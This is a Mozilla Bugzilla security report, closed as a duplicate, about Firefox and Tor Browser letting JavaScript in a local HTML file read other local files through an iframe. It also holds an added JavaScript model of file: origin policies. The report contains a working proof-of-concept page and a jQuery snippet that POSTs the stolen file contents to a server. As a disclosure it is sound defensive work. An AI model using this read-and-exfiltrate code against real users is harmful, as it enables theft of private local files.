Closed
Bug 1389481
Opened 8 years ago
Closed 8 years ago
Access to local file system using javascript
Categories
(DevTools :: DOM, defect)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 1389477
People
(Reporter: jenishsojitra99, Unassigned)
Details
Attachments
(1 file)
1.46 MB,
video/ogg
I have reported an issue in Tor Browser via HackerOne and they replied:
Thanks for making us aware of this problem. Have you contacted the Mozilla people? It seems the underlying problem is a Firefox bug and if it indeed is problematic I think all the Firefox users should benefit and not just Tor Browser users.
and suggested reporting it here.
Issue:
Access to local file system using JavaScript (slightly XSS on server side)
The browser can access local files using iframes with a local HTML file. This is very normal and often used for local web development, but JavaScript shouldn't be able to get the content of that iframe because this can be used to post the contents to the attacker's server. Something else I noticed is that it's not limited to the same directory.
Steps to Reproduce:
Save an HTML file from here and open it in Tor Browser.
<html>
<body>
<div id='div1'>
</div>
<script>
current_href = document.location.href
frame = document.createElement('iframe');
frame.src = current_href.replace('file:///home/jnsjns/Desktop/poc5.html', 'file:///home/jnsjns/Desktop/1.txt');
frame.id = 'frm';
document.getElementById('div1').appendChild(frame)
setTimeout(function func(){
  loot = document.getElementById('frm').contentWindow.document.getElementsByTagName('pre')[0].innerHTML
  alert('Your data is: ' + loot)
}, 500)
</script>
</body>
</html>
Explanation: file:///home/jnsjns/Desktop/poc5.html is my test HTML file here.
file:///home/jnsjns/Desktop/1.txt is the server-side local file in Tor Browser.
The private file comes up in a popup (I have tested in Google Chrome; they are safe from this).
What can an attacker do?
I would have been able to post it to my server using jQuery like this.
//Gets data from iframe and saves it to the getdata variable
getdata = document.getElementsByTagName('frm')[0].contentWindow.document.getElementsByTagName('pre')[0].innerHTML
//Posts to the php server located at 192.168.0.102 (local address for demo purposes)
$.ajax({type: "POST", url: "http://192.168.0.102/post.php", data: {string:getdata}});}
This issue may be critical.
THE POPUP SHOULD NOT COME OUT: WE CAN SEE THAT CHROME DOESN'T ALLOW THE USER TO EXTRACT JS AND TAKE POPUP. THEY HAVE FIXED THIS.
REGARDS.
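Whether the frame read in the report succeeds depends on which origin the browser assigns to file: documents. The following is an added example, not part of the bug report and not browser code: a simplified model of three possible rules, run against the two paths from the report. The policy names, the function names and the extra test paths are assumptions made for illustration.

```javascript
// Constructed model of same-origin decisions for file: URLs (not Firefox or Chrome source).
// Policies (names are hypothetical):
//   'all-files' : every file: document shares one origin
//   'directory' : a file may read files in its own directory and below
//                 (the rule MDN documented for Gecko file: URIs)
//   'unique'    : every file: document is its own opaque origin
function fileDir(url) {
  const p = new URL(url).pathname;            // the URL parser resolves "." and ".." segments
  return p.slice(0, p.lastIndexOf('/') + 1);  // keep trailing slash so "Desktop2" != "Desktop"
}

function canScriptReadFrame(parentUrl, frameUrl, policy) {
  const parent = new URL(parentUrl);
  const frame = new URL(frameUrl);
  if (parent.protocol !== 'file:' || frame.protocol !== 'file:') {
    // Ordinary scheme/host/port comparison; opaque ("null") origins never match.
    return parent.origin !== 'null' && parent.origin === frame.origin;
  }
  switch (policy) {
    case 'all-files': return true;
    case 'directory': return frame.pathname.startsWith(fileDir(parentUrl));
    case 'unique':    return false;
    default: throw new Error('unknown policy: ' + policy);
  }
}

// Paths from the report, plus two constructed targets outside the PoC's directory.
const POC = 'file:///home/jnsjns/Desktop/poc5.html';
const TARGETS = [
  'file:///home/jnsjns/Desktop/1.txt',
  'file:///home/jnsjns/Desktop/../notes/private.txt', // constructed: normalises outside Desktop/
  'file:///home/jnsjns/Desktop2/1.txt',               // constructed: sibling with shared prefix
];

function evaluate() {
  const rows = [];
  for (const policy of ['all-files', 'directory', 'unique']) {
    for (const target of TARGETS) {
      rows.push({ policy, target, readable: canScriptReadFrame(POC, target, policy) });
    }
  }
  return rows;
}

console.table(evaluate());
```

Only the `unique` rule blocks the read of `1.txt` that the report demonstrates; the `directory` rule still allows it because both files sit in the same folder.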
Updated•8 years ago
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•7 years ago
Product: Firefox → DevTools
Updated•5 years ago
Group: firefox-core-security